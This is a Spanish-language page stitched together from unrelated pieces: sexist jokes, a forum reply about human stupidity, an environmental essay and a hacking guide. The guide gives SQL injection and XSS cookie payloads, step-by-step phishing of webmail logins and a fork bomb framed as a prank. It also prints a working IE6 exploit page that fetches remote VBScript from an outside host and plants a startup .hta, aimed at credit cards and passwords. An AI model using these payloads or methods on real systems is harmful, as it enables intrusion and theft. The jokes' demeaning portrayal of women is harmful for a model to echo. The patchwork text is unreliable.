MaRthSeCtorReBorN

EL SIGNIFICADO DE LOS SUEÑOS Una mujer se levanta por la mañana, despierta a su marido y le dice: "Cariño, he tenido un sueno maravilloso. He sonado que me regalabas un collar de diamantes por mi cumpleaños. Que querrá decir?". El marido le contesta: Lo sabrás en tu cumpleaños... Llega el día del cumpleaños de la esposa y el marido entra en casa con un paquete en la mano. La mujer, emocionada, se lo quita de las manos, rasga nerviosa el papel, abre rápidamente la caja y encuentra un libro titulado: "El significado de los sueños". DESHONRA Carmen era una chica que estaba a punto de cumplir quince anos, por lo que su madre, preocupada, se pasaba el día diciéndole: "Hija, por favor, ten mucho cuidado con los hombres... primero te invitan al cine, te empiezan a tocar todo, te llevan a su apartamento, te besan, te quitan la ropa y después, ya sin braguitas, se te suben encima y te deshonran, a ti y a toda tu familia!" Dicho y hecho. Carmen conoce a un chico y este la invita al cine. A la mañana siguiente, Carmen llega a casa toda despeinada y le dice triunfalmente a su madre: "Mama, paso exactamente como me dijiste! Juan me invito al cine y me toco por todas partes. Después me llevo a su apartamento, empezó a besarme y a quitarme toda la ropa. Pero cuando me quito la truza, me adelante!... me subí yo encima y lo deshonre a el y a toda su familia!" LIBRE ELECCION Un hombre tenia 3 novias. Para decidirse en el dilema de con cual casarse, les entrego 1.000 dólares a cada una, para ver que hacían con el dinero. La primera cogió todo el dinero y se fue a la peluquería, se hizo la manicura, la pedicura, se corto y tino el pelo, se fue de compras y compro lujosas ropas y joyas. "Lo he hecho por ti", le dijo cuando lo vio. " Deseo estar muy guapa para ti porque te amo muchísimo." La segunda tomo el dinero y compro un equipo estereo, un Rolex de oro de caballero, un reproductor de CD's portátil y unas corbatas carísimas. Cuando lo vio le entrego todo y le dijo: te he comprado todo esto La tercera invirtió todo el dinero en bolsa. Gano el doble de dinero, cogió la mitad y reinvirtió el resto, devolviéndole los mil dólares que le había dado. "He invertido el dinero para ti, y lo he doblado. Te devuelvo lo que me has dado, y reinvierto lo demas para nuestro futuro porque te quiero muchísimo." El hombre analizo cuidadosamente todos y cada uno de los comportamientos, sopesando pro y contra de cada una y, tras mucho pensar, decidió casarse con: LA QUE TENIA LOS PECHOS MAS GRANDES !!! LA INMADUREZ DE LOS HOMBRES Cuando cumplí 14 años esperaba algún día tener una novia. A los 16 tuve una novia, pero no había pasión. Entonces decidí que necesitaba una mujer apasionada, con ganas de vivir. En la Universidad salí con una mujer apasionada, pero era demasiado emocional. Todo era terrible, era la reina de los dramas, lloraba todo el tiempo, amenazaba con suicidarse. Entonces decidí que necesitaba una mujer estable. Cuando tuve 25 años encontré una mujer muy estable, pero aburrida. Era totalmente predecible y nunca la excitaba nada. La vida se hizo tan plomiza que decidí que necesitaba una mujer mas emocionante. A los 28 encontré una mujer excitante, pero no pude seguir su ritmo. Iba de un lado a otro sin detenerse en nada. Hacia cosas impetuosas y coqueteaba con cualquiera que se le cruzara. Me hizo tan miserable como feliz. De entrada fue divertido y energizante, pero sin futuro. Entonces decidí buscar una mujer con alguna ambición. Cuando llegue a los 31, encontré una chica inteligente, ambiciosa y con los pies sobre la tierra. Decidí casarme. Era tan ambiciosa que me pidió el divorcio y se quedó con todo lo que yo tenía. Ahora, a los 50, me gustan las mujeres con tetas grandes, buen poto y punto. Por fin madure!.... Carajo...!!! Después de unos días, Doos llamó a Adán, y dijo: - Es tiempo que tu y Eva empiecen el proceso de poblar la Tierra, de manera yo quiero que empieces besando a Eva. - Sí Señor, ¿pero que es un beso? - preguntó Adán. De modo que el Señor le dio una descripción breve a Adán y Adán tomó Eva entonces por la mano, y la llevó detrás de un arbusto cercano. Después de unos minutos Adán surgió, y dijo: - Señor que agradable era. Y el Señor contestó: - Sí, Adán, yo pensé que vosotros disfrutarían, y ahora me gustaría que tu acariciaras a Eva. - Señor, ¿que es una caricia? De modo que el Señor le dio una descripción breve a Adán y Adán fue de nuevo detrás del arbusto con Eva. Varios minutos después, Adán volvió, sonriente, y dijo: - Señor, fue incluso mejor que el beso. - Has hecho bien, Adán, y ahora quiero que hagas el amor con Eva. - Señor, ¿que es hacer el amor? Por lo que el Señor le dio instrucciones de nuevo a Adán, y Adán fue con Eva, detrás del arbusto. Pero este reapareció en dos segundos: - Señor, ¿que es un el dolor de cabeza?

"Hay dos cosas infinitas, el universo y la estupidez humana y del universo no estoy seguro" Albert Einstein la estupidez como caracteristica esencial del ser humano ,como elemento inseparable de nuestra conducta . y como categoria primordial de nuestra imperfeccion,es cotidiana e inabarcable ,colectivamente nos supera siempre. basta por ejemplo con observarnos solo un instante a nosotros mismos,al amigo,al politico,a los cientificos.a los que participamos en foros etc etc etc. ¿ por que la mayoria de los seres humanos y ud amigo lector no se acepta asi mismo como estupido Hacia tiempo que no veía una reflexión que reflejara tan bien su enunciado. Eso debe ser sin duda mérito, inequívocamente, de la “estupidez” de la que participamos (y siempre en los términos del enunciado),… es difícil en tan pocas palabras reflejar tanto caos en una reflexión,… pero sin duda,… ¿¿Qué se nos puede pedir como “especie”,… si el principio de todas las cosas (o “áperiron” en los términos de Anaximandro de Mileto),… si lo que nos permite explicar la derivación de todas las cosas,… es la “estupidez humana”??. Pero reflexionemos “estúpidamente” sobre las palabras que preceden a este comentario,… veamos: Estupidez como “característica esencial del ser humano”,… ¿entonces?,… la “Estupidez” es un concepto ideal del que participamos activamente como especie,… o por el contrario,… y a la luz del enunciado (a saber, “la estupidez humana”), ¿la “Estupidez” no es un único concepto ideal,… sino que hay varios,… y nosotros participamos como especie de la “estupidez humana”,… y nos libraríamos por tanto de la “estupidez vegetal”, o de la propia de cualquier otra especie animal!??,… en cualquiera de las dos modalidades,… se nos presenta una “Estupidez” que se nos impone coercitivamente,… que da cuenta de nuestra identidad colectiva, y por tanto, también de nuestra identidad individual,… esto presenta un nuevo dilema: ¿todos participamos igualmente de esta “estupidez humana“?, ¿hay personas que participan de esta estupidez de una forma mas activa que otras?,¿podemos encontrar en los humanos algún tipo (en una u otra medida) de estupidez no propia de los humanos?, ¿de resolver positivamente este último caso,… eso significaría que algún sujeto ha sobrepasado los límites de la “estupidez humana”,… y que ha tenido que “colonizar” otros tipos de estupidez, en su inexorable búsqueda de la “Estupidez Verdadera”? (lamentaría profundamente si alguien se sintiese molesto por mi exposición casi religiosa de alguno de los ejemplos,… pero hay que tener en cuenta que el participar activamente de la estupidez, da argumentos sobrados para decir casi cualquier cosa teniendo una coartada perfecta!!),… Pero sigamos!,… que la cosa se pone interesante!!,… cito: “como elemento inseparable de nuestra conducta y como categoria primordial de nuestra imperfeccion,es cotidiana e inabarcable ,colectivamente nos supera siempre”,… es decir,… por resumir y no hacer mas larga esta reflexión sobre el comentario,… Estupidez: 5- humanos: 0,… nos supera por goleada!,… el caso es que el razonamiento tiene su propia inercia,… si es cierto, como presupone la exposición inicial, que existe la “estupidez humana”, no pude ser de otra manera, que nuestra conducta y comportamiento (en cualquiera de sus modalidades y situaciones) se vea afectada por tal estupidez,… pero,… de ahí a situar la estupidez en la cima jerárquica de las categorías que dan cuenta de nuestra imperfección,… es un salto cuántico que precisa de mayor aclaración,… uno se pregunta estúpidamente, si no estaremos sobrevalorando la estupidez,… aunque, que duda cabe que la vida te sorprende de vez en cuando, con un alarde de estupidez, y en los sitios menos esperados!,… Visto así,… sorprende que las culturas clásicas no dedicaran un templo para el que sin duda sería uno de los dioses mas venerados por la especie!,… y a pesar que “LA estupidez”,… debería ser representada (en esta grotesca imagen) como una mujer (haciendo, como no!, uso de nuestra más que sabida estupidez y también machismo),… yo mi imagino estúpidamente una imagen al más puro estilo “Ace Ventura”,… pero esto no es mas que una divagación estúpida!. Pero no nos distraigamos de nuestro cometido!!,… que llega lo mas interesante!!!,… y es, el momento en que se nos informa de la metodología utilizada para llegar a tan feliz conclusión,… veamos,… y cito: “basta por ejemplo con observarnos solo un instante a nosotros mismos,al amigo,al politico,a los cientificos.a los que participamos en foros etc etc etc.”,… para los que hayan tenido la gallardía de llegar hasta este punto en todo este conjunto de estupideces recolectadas por mi,… debemos prestar especial atención en este punto, y es que,… rezumamos estupidez, y es evidente a la luz de la “observación”,… yo supongo,… y esto si que es algo que necesitaría de aclaración,… y es que cabe suponer, que el “investigador” ha utilizado la “observación PARTICIPANTE”,… como método, en detrimento de otros tipos, propios también de la metodología de la observación,… ¿¿¿supongo que el “investigador” en cuestión no pretenderá escapar de su axioma!???,… Pero no hay restar mérito a la teoría propuesta!!,… en su favor cabe decir,… que es una teoría de carácter profundamente democrático!!,… y que proclama la igualdad de la especie en términos de estupidez!!!,… por fin,… hemos encontrado algo que nos une como especie,… que se nos impone por encima de cualquier otra diferencia!!,… “Todos somos iguales a los ojos de la Estupidez”!!!,… Sólo confío que la ultima pregunta que se nos propone, y cito: “¿ por que la mayoria de los seres humanos y ud amigo lector no se acepta asi mismo como estupido?”,… no pretenda excluir al autor de tan “estupidas” palabras,… sería un flaco favor a la teoría!!,… por otro lado esta “estúpida” pregunta deja al descubierto su “estupidez”, al responder por ella misma, y sin dejar espacio a mi propia estupidez para responderla,… ¿se impone pues la “estupidez” de la pregunta, por encima de la mia!?,… ¿se trata pues, nuevamente, de hacer una jerarquía de estupideces!?,… En fin,… podría seguir estúpidamente, diciendo más estupideces,… pero será mejor que reserve alguna para mi vida cotidiana,… no quisiera agotar mi estupidez de un plumazo y que mis acciones y actitudes cotidianas se resintieran por la falta ocasional de estupidez!!,… Estúpidamente!,… otro estúpido, por lo visto!!!,…

Veneno en el cielo Amanece y inicia la vida cotidiana, se observa a través de la ventana de cada mísero hogar la humareda que se desplaza sigilosamente en el cielo, tan pesada que disminuye la energía vital de cada ser viviente de este planeta, que comparte a la vida que cobija sus gases tóxicos, su calor sofocante, sus mas pequeños elementos que se filtran a través de los pulmones y destrozan la arterias de los mamíferos, así es esta nube tan horrorosa que marca el inicio del Apocalipsis, el cielo se torna naranja cuando los rayos lumínicos la traspasan, y se ve como día a día se alimenta gracias al ser mas despiadado, egoísta, necio, avaro, consumista, materialista que habita en el único astro capaz de albergar y dar vida en el oscuro espacio; ese ser se llama así mismo ser humano, una especie efímera capaz de modificar el ambiente según sus necesidades, de crear, de innovar, de comunicarse, de reproducirse a gran escala, de producir a nivel industrial, que se diferencia del resto de seres vivos por su cultura y civilización. “virtudes” que han cegado su juicio y que ceban el monstruo que crece sin desenfreno que se fortalece de los desperdicios antropogénicos, la deforestación, la desertificación, de la combustión motriz, crecimiento demográfico acelerado, esperpento epitome de la existencia humana ha aplastado la tierra, el agua, el aire y junto con ellos su flora y su fauna. La naturaleza no soporta más, la balanza se inclina hacia la extinción, la sequía, la escasez de alimentos, el aire asfixiante, el calentamiento global. En suma el creador pagara su yerro y saborarea con sus cinco sentidos el austero futuro y dolor que carcome el planeta, no habrá sitio a donde migrar, no hay escapatoria, el desequilibrio generara un nuevo inicio todo lo que el ser humano conoce desaparecerá y la búsqueda de restablecer la armonía marcara sin duda el fin. Ente que te desenvuelves en el presente despierta, ya has visto el futuro, no te acongojes, reflexiona se fuerte, permuta tu interior y promoverás el cambio a los que te rodean ayuda al planeta, lígate a la naturaleza, limpia sus lagrimas, consuela su tristeza, olvídate de políticas infructuosas y de la obtención de vienes innecesarios, independízate del combustible fósil, abarrota tu casa de alimentos naturales y desecha la comida chatarra, deja el materialismo y consumismo de lado, protege tus bosques y has frente a aquellos que busquen riquezas en base a destrucción y extirpación de los recursos naturales, educa a tus hijos sobre la importancia de su habitad y cuidados que este merece, piensa en tu fauna y flora; sin ellos no deambularías en este planeta. Aferrate a la idea de recabar el equilibrio antes de que la “gran energía que da vida” lo haga por ti.

Ahora bien, quizás estas leyendo esto porque quieres hacerte una idea de cómo se hackea un sitio. Existen varios niveles y técnicas de hackeo: Change Coding Este tipo de hackeo es muy divertido y, la mayoría de las veces, inocuo. Se trata simplemente de modificar el código que despliega una página de Internet agregando órdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental página de Google ha sufrido este tipo de hacking. SQL Injection Como habrás notado, muchos sitios en la red muestran una caja de "Buscar" o "Search". En SQL el punto y coma ( funcionan como el fin de comando y el doble guión (--) como comentario. Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan los passwords de los usuarios puedes jugar un poco enviando cosas como: UPDATE users SET password="hack"; este tipo de hackeo es muy entretenido (horas y horas de sana diversión ;-) ) y te sorprenderás del hecho de que incluso sitios de grandes empresas internacionales no poseen ningún sistema de filtrado. SQL Ruleezzz!!! Phising "password harvesting fishing" (cosecha y pesca de contraseñas) es una técninca que consiste en duplicar (hasta en el más mínimo detalle) un sitio web verdadero en nuestro propio servidor. Debemos ir a Hotmail, Gmail, Yahoo!, etcétera, ver el código HTML y guardarlo en nuestro propio server. Luego enviamos un email a la persona de la cual deseamos su clave con algo como "Alguien muy especial te ha enviado una Ciber-tarjeta, haz click aquí" y lo enviamos a nuestro propio Webserver en Linux. El usuario cree que está entrando en la página de inicio de Hotmail e introduce su login y password, ¡pero ahora es nuestro! Dictionary's attack Existen personas (y administradores de sistemas) que piensan que por usar palabras como "fanerogama"o "porfirogeneta" como password, nadie los podrá adivinar. Pero en realidad esas palabras existen en cualquier diccionario, y los diccionarios que sirven para revisar la ortografía en los procesadores de texto como AbiWord, también pueden ser usados para intentar logearse dentro de un sistema ajeno. Existen scripts que usan cada palabra de los diccionarios en español, inglés, francés, finlandés, turco, etc. para hacer un login. Estos scripts pueden tardarse mucho tiempo haste encontrar un password que corresponda a la palabra y cuando lo hacen, envian un email al hacker para avisarle cual palabra es un password. Los hackers que se consideran a sí mismos elegantes y creativos sienten aversión por este tipo de hackeo pues en el simplemente se aplica la fuerza bruta (y la paciencia). buffer overflow (o simplemente overflow). Los programas se almacenan en buffers (secciones contiguas de memoria), bajo ciertas circunstancias los datos que se envían al buffer sobrepasan su capacidad y la memoria se "desparrama", generalmente esto provoca que el programa colapse pero muchas veces, durante una pequeña fracción de segundo, la información enviada al buffer puede ejecutarse con los permisos del usuario dueño del proceso. El hacker (que debe conocer bien C y ensamblador) aprovecha esto, envía muchos datos al buffer, para desbordarlo y ejecutar código malicioso. Existen pocos hackers con el suficiente talento como para aprovechar un overflow recién descubierto, el problema es que luego de un par de semanas de conocido el exploit, comienzan a aparecer en la red scripts que automatizan el hackeo y todos los script kiddies comienzan a ejecutarlos. Solución: coloque un "apt-get -f -y dist-upgrade" en el cron y manténgase informado. A los errores en la programación se les conoce como "bugs" o bichos, la mayoría de los bugs sólo hacen que los programas no funcionen como deben pero algunos pueden ser aprovechdos para violar la seguridad, a estos bugs se les conoce como "exploits". Es decir, no todos los bugs son exploits pero todo exploit es un bug. Denegation of Service o DOS La denegación de un servicio implica que el hacker ha aprovechado un bug en un programa para " tirar" un servicio del servidor. Generalmente se trata del Webserver. El IIS de Microsoft es particularmente vulnerable a este tipo de ataques. Tanto el Change Coding como el DOS son hacks relativamente benévolos pues no implican (necesariamente) a un intruso en el sistema. Aplication level Esto ya es más serio, alguien se ha apropiado de una aplicacón del sistema. La mayoría de las veces se trata de una aplicación Web como PHP-Nuke o MyAdmin. Sin embargo en ocasiones el dominio de una aplicación conduce a tener más accesos y facilidades en el hackeo. Root hacking Este es el hack más grave, el hacker ha tomado el control del sistema y puede hacer lo que quiera con él. Generalmente el hacker tratará de pasar desapercibido y creára un usuario con todos los derechos para entrar cuando quiera al sistema y regodearse de lo poco hábil que es el administrador. Hay que considerar que muchas veces no existe una diferencia clara en estos niveles. Muchos hackeos al root empezaron siendo un simple juego de Cross Scripting con el cual el hacker obtuvo el password de PHPNuke, con lo cual se hizo con el password de Mysql y dado que era una versión no actualizada de Mysql, ejecutó un overflow con el que se hizo root. Si detectamos un root hacking lo primero es desconectar el equipo de la red, hacer un análisis forense de los paso del hacker, respaldar y formatear el disco duro incluyendo el MBR. Muchos administradores se sienten avergonzados y reinstalan el sistema rápidamente y sin decirle a nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde y reconozca que ha sido vencido en buena lid. Infórmele a sus colegas y hagan juntos el análisis de cómo fue que el intruso entró y como mejorar las políticas para que eso no vuelva a ocurrir. Un hacker puede enseñarle muchísimo sobre seguridad, aún cuando no hubiese tenido ninguna intención de ello. Cross Scripting, o XSS, es una técnica de hackeo que consiste en enviar información maliciosa a través del browser. En versiones anteriores de Internet Explorer era suficiente con colocar ?op=userinfo&uname=<script>alert(document.cookie);>/script> En el URL para ver la información de otros usuarios en un sitio de ventas por Internet. Generalmente todo ataque comienza con nmap, este es un programa de escaneo de puertos. El escaneo de puertos permite conocer que sistema operativo y que servicios posee un servidor de la red. Si no tiene nmap instálelo con apt-get. Algunas opciones de escaneo de nmap sólo pueden ejecutarse como root: # nmap -sS -sV -P0 www.algoaqui.com Lo que verá, luego de un minuto de espera, será la lista de los servicios y el programa que los ejecuta (Apache, Qmail, SSH, vsFTP, etcétera). ¿Cómo funciona nmap?, bueno, es como si arrojara piedritas a las ventanas de una casa para ver quién se asoma y cómo es. De la misma manera nmap envia miles de peticiones de distintos tipos (TCP/UDP) a todos los puertos del servidor esperando que alguien le conteste. Los programas creen que alguien los está llamando pero nmap no mantiene contacto: sólo quiere saber si hay alguien en esa ventana ;-). De esta manera muchas herramientas pensadas para detectar intrusos nunca se enteran que nmap estuvo husmeando por sus puertos. En la película Matrix se puede ver a Trinity usando Nmap para hackear un exploit de la versión 1 de SSH: Tenga cuidado, en Estados Unidos y varios países de Europa el escaneo de puertos es un delito y varias corporaciones se han tomado muy en serio seguirle la pista de los husmeadores y acusarlos con su proveedor de internet. De hecho, si usted frecuenta el sitio de nmap y sus listas de correo, seguramente su nombre ya está en alguna base de datos del FBI. Por supuesto, como muchas otras leyes, estas leyes son idiotas: sin gente escaneando puertos y tratando de entrar a los sistemas aún estaríamos usando Windows 3.11. El mundo tiene una deuda con los hackers que se niega a reconocer, sin ellos el comercio electrónico hubiese sido imposible. Si usted está en América Latina no se preocupe, nuestros legisladores ni siquiera saben (ni les interesa saber) qué es un escaneo de puertos. Una vez que sepas que programas se están ejecutando realiza una busqueda en google sobre algún exploit relacionado. En todos los programas, tarde o temprano, se descubre una vulnerabilidad, con suerte, el admistrador del servidor no ha actualizado en semanas o meses y tú puedes intentar entrar. Existen muchos scripts, sobre todo de Perl, que intentan hackear un sitio sólo ejecutándolos, hay mucha gente que no tiene idea de cómo funcionan estos scripts y simplemente los ejecutan hacia un servidor. Cada tres o cuatro días en mi log de Apache aparece alguien que corrió uno de esos scripts... ¡que eran para IIS! A estos soterutanos se les conoce como Script Kiddies y conforman un vergonzoso tipo de lamer. Si entras a un IRC preguntando sobre cómo aprender a hackear, algún inconsciente, por jugarte una broma, te dirá que hace poco él descubrió una forma de tirar el sitio de Microsoft y te pedirá que escribas en el shell: # nmap-O www.microsoft.com && : (){ : |:& };: ¡No lo hagas! tu sistema se congelará por falta de memoria y la única manera de "destrabarlo" será reiniciar todo el equipo con el botón de reset del CPU. Un hack que está de moda es un hoyo crítico de seguridad en el IE 6 de Windows XP, este hoyo está presente incluso si se tiene el Service Pack 2 y afecta tanto a la versión Home, como la "Professional" (Microsoft gastó cientos de millones en el SP2 pero al parecer de poco sirvió). Fijate en la siguiente página sp2rc.html: <OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value="command;file://C:\WINDOWS\---PCHealth\HelpCtr\System\blurbs\tools.htm">---</OBJECT> <OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value='command;javascript: execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://www.mononeurona.org/writehta.txt\\\"\" +String.fromCharCode(62)+\" </scr\"+\"ipt\"+String.fromCharCode(62))"'> </OBJECT> <script> localpage.HHClick(); setTimeout("inject.HHClick()",100); </script> El objeto id: localpage (que posee un formato de extensión de los archivos de ayuda de Windows) le dice a hhctrl.ocx que abrá una ventana de ayuda para C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm (un archivo normal del sistema que está en todos los Windows XP). El segundo objecto id: inject llama al script hospedado en www.mononeurona.org/writehta.txt que inyecta el código remoto de este archivo, haciendo un XSS típico. El archivo writehta.txt contiene instrucciones maliciosas para crear un objeto ADODB.Connection: Dim Conn, rs Set Conn = CreateObject("ADODB.Connection" Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.mononeurona.org;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset" rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ Microsoft Office.hta", adPersistXML rs.close conn.close window.close Este archivo es usado para ejecutar un query SQL: sql = "SELECT * from foobar.txt", donde foobar.txt es hospedado en el servidor FTP del atacante (el cual está configurado para permitir el acceso anónimo). El resultado del query se salva en el archivo C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta. El objeto ADODB y el archivo foobar.txt también pueden ejecutarse colocándolos escondidos como si fuesen una imagen: <img id="dyn" src="malwarez6.mcb" border="0"> todos los antivirus están configurado para no escanear los archivos de imágenes de modo que podemos colarnos con facilidad al sistema. Practicamente no hay límites en lo que uno puede guardar en este archivo hta y además, como se guarda en el menú "All Users" se ejecuta cada vez que un usuario se logea en Windows XP. Por supuesto lo primero que una persona maliciosa haría sería buscar los números de tarjetas de crédito y los password de todo el sistema ¡Gracias Microsoft! Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un email o apretar un botón, simplemente entrando a la página sp2rc.html. Miles de páginas en Internet tienen este código y si usted usa Internet Explorer 6 para navegar seguramente ya tiene el archivo hta en su disco pues los antivirus no lo detectan. Como digo, este código está muy de moda, y al parecer no habrá parche hasta finales del 2005. Los que usan [[http://www.mozilla.org/products/firefox/ Mozilla-Firefox]] en XP están a salvo, pues este código no les afecta ;-). De cualquier manera si se ve a obligado a usar Windows XP por la necesidad de usar CorelDraw o Autocad no navegue en este sistema operativo. Al terminar de usar ese programa, bootee a Linux (porque tiene Linux ¿verdad?) y desde ahí navegue, consulte su email y use Messenger. Si tú, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos básicos de seguridad: 1. Instala lo mínimo indispensable Realiza un deborphan cada tanto, no instales samba en un equipo que tiene webserver. 2. Usa password alfanuméricos Mezcla números y letras como caktus90 o 8qwer9. No uses passwords de palabras que están en el diccionario. No uses un password del sistema para suscribirte a una lísta de correo o un foro. 3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre SSL como vsFTP. No permitas accessos remotos del root por SSH. Permite un solo usuario en AllowUsers para evitar ataques de diccionario. Trata de encriptar todo lo que entre al sistema, incluyendo el correo. 4. Actualiza cada semana De preferencia realiza las actualizaciones de noche, si apt-get sugiere instalar un nuevo archivo de configuración en lugar del que estás usando prefiere el que trae el paquete, muchas veces el problema no es el programa sino la configuración. 5. No instales las X Un servidor no siquiera debería de tener monitor, todo debe hacerse a través de SSH. 6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados" en un chroot. 7. Watch Log Instala un reporteador de logs que te envie un reporte general del sistema cada tres días, hay mucha información útil en los logs que se pierde por no saber extraer la información. 8. No instales compiladores Si necesitas compilar un nuevo kernel, desinstala gcc y el paquete libc6-dev luego de bootear con el nuevo kernel. 9. Suscríbete a una lista de anuncios de seguridad Existen muchas, también puedes visitar sitios como [[http://www.cofradia.org/ La cofradía]] donde se anuncian bugs de seguridad y cómo corregirlos. 10. Nmap on myself Una forma de descubrir si un troyano ha abierto un backdoor es correr nmap contra nuestro propio servidor. Así te darás una idea de lo que un hacker (o cracker) vería si escanea tu servidor. 11. Apache mod_security No sé porque este magnífico módulo no viene por omisión pero practicamente todos los Cross Scripting quedan anulados con él. 12. MVC El model view controller no sólo sirve para separar el diseño de la programación sino que incrementa la seguridad. Si estas haciendo una aplicación web con python, php o perl crea una clase para la base de datos que guarde los valores, cierra la base de datos y después inserta los valores en el código XHTML. No hackeamos cuentas de hotmail.com, no preguntes como ser un hacker: instala Linux en tu equipo con el Webserver, programa en Perl y serás un hacker. yO se ke muchos no entenderan nada!!